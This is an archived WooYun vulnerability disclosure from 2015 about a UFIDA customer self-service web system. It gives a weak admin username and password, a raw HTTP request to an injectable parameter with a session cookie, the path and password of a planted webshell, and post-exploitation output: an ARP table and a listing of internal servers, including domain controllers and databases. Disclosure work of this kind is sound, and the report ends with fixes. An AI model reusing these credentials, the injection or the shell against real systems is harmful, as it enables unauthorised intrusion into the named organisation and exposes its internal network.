乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-27: 厂商已经主动忽略漏洞,细节向公众公开
弱口令、sql注射、getshell
系统地址:http://vip.ufida.com.cn/Frame/Index.aspx
弱口令帐号:adminnc密码:adminnc
在自助查询处,发现注入(需要登录,注意cookie有时效)
GET http://vip.ufida.com.cn/RepositorySearchInfo/DoctInfo.aspx?ReposID=38d4a08e-8b79-4de7-8566-30aecfb1d56f HTTP/1.1Accept: text/html, application/xhtml+xml, */*Referer: http://vip.ufida.com.cn/RepositorySearchInfo/DoctList.aspx?Type=MainPageClickAccept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateHost: vip.ufida.com.cnConnection: Keep-AliveCookie: ASP.NET_SessionId=szvzcr45nfresnqlzjhbtsqe
支持unionsa权限
可内网
找到web根路径后写shell
http://vip.ufida.com.cn/wooyun.aspx
密码wpp
支持union就是快
D:\E_data\战略客户自助系统网站\wwwroot\> arp -aInterface: 192.168.8.90 --- 0x10003 Internet Address Physical Address Type 192.168.8.2 00-50-56-83-0c-49 dynamic 192.168.8.3 00-50-56-83-0c-50 dynamic 192.168.8.4 00-50-56-83-30-ab dynamic 192.168.8.7 00-50-56-83-56-6e dynamic 192.168.8.9 00-0f-e2-30-7f-c9 dynamic 192.168.8.32 00-50-56-83-4b-1a dynamic 192.168.8.38 00-21-28-14-c9-ba dynamic 192.168.8.57 70-e2-84-07-31-18 dynamic 192.168.8.67 c4-ca-d9-c6-d0-58 dynamic 192.168.8.72 70-e2-84-07-31-e4 dynamic 192.168.8.77 00-15-17-ce-9f-31 dynamic 192.168.8.80 90-e2-ba-5d-ac-1f dynamic 192.168.8.83 90-e2-ba-57-f9-97 dynamic 192.168.8.105 e8-39-35-22-42-42 dynamic 192.168.8.112 3c-e5-a6-af-21-b5 dynamic 192.168.8.113 00-1a-4b-de-ae-ae dynamic 192.168.8.114 70-e2-84-07-31-18 dynamic 192.168.8.118 00-1e-68-78-f8-a9 dynamic 192.168.8.119 70-e2-84-07-31-e4 dynamic 192.168.8.134 00-50-56-83-36-20 dynamic 192.168.8.135 00-15-17-b7-1b-15 dynamic 192.168.8.136 00-50-56-83-00-02 dynamic 192.168.8.137 00-50-56-83-00-36 dynamic 192.168.8.138 00-50-56-83-53-95 dynamic 192.168.8.151 00-25-b3-25-a6-a2 dynamic 192.168.8.153 00-50-56-83-0b-84 dynamic 192.168.8.156 00-21-28-14-ca-92 dynamic 192.168.8.164 00-50-56-83-4a-e9 dynamic 192.168.8.168 00-50-56-83-12-69 dynamic 192.168.8.174 70-e2-84-07-31-e4 dynamic 192.168.8.180 00-50-56-83-6c-e3 dynamic 192.168.8.184 00-50-56-83-0c-8e dynamic 192.168.8.192 00-50-56-83-2f-8f dynamic 192.168.8.196 00-50-56-83-3b-08 dynamic 192.168.8.197 c8-9c-dc-33-ad-37 dynamic 192.168.8.199 00-1a-4b-de-18-82 dynamic 192.168.8.200 00-0c-29-29-0b-1c dynamic 192.168.8.201 00-15-17-5f-0d-59 dynamic 192.168.8.203 00-e0-81-d2-d8-49 dynamic 192.168.8.210 d4-85-64-4b-c0-b8 dynamic 192.168.8.211 00-50-56-83-5c-e1 dynamic 192.168.8.212 f8-bc-12-4e-9c-06 dynamic 192.168.8.213 00-50-56-83-00-1d dynamic 192.168.8.214 00-e0-81-de-99-5b dynamic 192.168.8.215 00-00-5e-00-01-0f dynamic 192.168.8.216 00-23-7d-57-8a-88 dynamic 192.168.8.217 00-23-7d-56-60-dc dynamic 192.168.8.218 00-23-7d-56-60-dc dynamic 192.168.8.219 18-a9-05-60-b9-e0 dynamic 192.168.8.220 18-a9-05-46-3a-08 dynamic 192.168.8.221 00-14-5e-1c-81-3f dynamic 192.168.8.222 00-00-5e-00-01-05 dynamic 192.168.8.223 00-50-56-83-63-72 dynamic 192.168.8.224 18-a9-05-53-0f-64 dynamic 192.168.8.225 44-1e-a1-4d-31-06 dynamic 192.168.8.226 00-50-56-83-46-9f dynamic 192.168.8.227 00-00-5e-00-01-09 dynamic 192.168.8.228 00-50-56-83-00-8d dynamic 192.168.8.229 00-a0-b8-56-26-92 dynamic 192.168.8.230 00-21-97-02-8f-c1 dynamic 192.168.8.231 00-50-56-83-05-f8 dynamic 192.168.8.233 00-21-28-f1-7e-ce dynamic 192.168.8.234 00-1a-4b-de-bf-7a dynamic 192.168.8.236 00-e0-81-dc-26-4b dynamic 192.168.8.237 00-e0-81-d8-54-e7 dynamic 192.168.8.238 00-50-56-83-2b-41 dynamic 192.168.8.239 00-a0-b8-56-26-50 dynamic 192.168.8.240 00-15-17-da-a6-50 dynamic 192.168.8.241 18-a9-05-40-af-d2 dynamic 192.168.8.242 00-e0-81-de-9b-96 dynamic 192.168.8.243 00-21-97-42-80-d8 dynamic 192.168.8.244 3c-d9-2b-f6-ef-70 dynamic 192.168.8.245 00-e0-81-d7-72-37 dynamic 192.168.8.246 00-50-56-83-47-d8 dynamic 192.168.8.247 00-90-fb-44-fe-8a dynamic 192.168.8.248 c4-ca-d9-de-c2-8a dynamic 192.168.8.249 c4-ca-d9-de-32-01 dynamic 192.168.8.251 00-50-56-83-29-2c dynamic 192.168.8.253 00-15-60-a2-94-81 dynamic 192.168.8.254 00-e0-86-17-b1-0d dynamic
D:\E_data\战略客户自助系统网站\wwwroot\> net view服务器名称 注释-------------------------------------------------------------------------------\\BG-DC-01 \\BG-DC-02 \\BGVC \\BI \\CAIWUAPPS CaiWuApps \\CASERVER \\CWHR \\DDFWS-C117DB6F3 \\EVENTLOG \\FTPSERVER \\GSALEDB \\IMC-01 imc-01 \\IMC-02 imc-02 \\IMC-03 \\IMC-04 imc-04 \\IMCPT \\IT-36800 \\IT_FAWEN_09_25 \\ITCOMMDATASERVE \\ITDATABASE \\ITTFS \\ITTFS2010 \\JTSJJCB-2012-01 \\KMS08 \\MSNCASRV_09_26 \\PORTAL8211 portal \\SALEAPP \\SALES_MANAGEMEN \\SUP2008 \\TKR TKR \\U8SERVICE \\UF-BG-TEMPLATES \\UF200703009 \\UF200703055A \\UF200703073 \\UF200802416 \\UF200903057 \\UF200903072 \\UF200903079 \\UF201003115 \\UF201103087 \\UF2013-PCAS \\UFAPP \\UFBGDC01 \\UFCUSDB \\UFCWSERVER2 \\UFEDGESRV \\UFGOV-KAOQIN \\UFGROUP ufgroup \\UFGROUP2013 \\UFGROUPAPP2 \\UFIDA-D79A6DC9F \\UFIDA-WINS \\UFIDASERVER1 \\UFIDASRV2 \\UFIDAWEBDATA \\UFNAS1 \\UFPARK \\UFPARK_BAK_10_0 \\UFPMP \\UFPORTALSRV ufpo \\UFREGISTER2 \\UFSEA \\UFSEADB \\UFSEARCH \\UFSERVERDB \\UFTDC11 \\VIP \\VPN_LOG \\WEBSUPPORT we \\WIN-7NNI89H987C \\WIN-9QKG6QS0TNM \\WSUS02 \\XHZWEBCOUNT \\XMGLNET UFPMP \\YONYOU-129D63B7 命令成功完成。
强口令,参数化查询,删除shell
危害等级:无影响厂商忽略
忽略时间:2015-10-27 11:14
漏洞Rank:4 (WooYun评价)
暂无
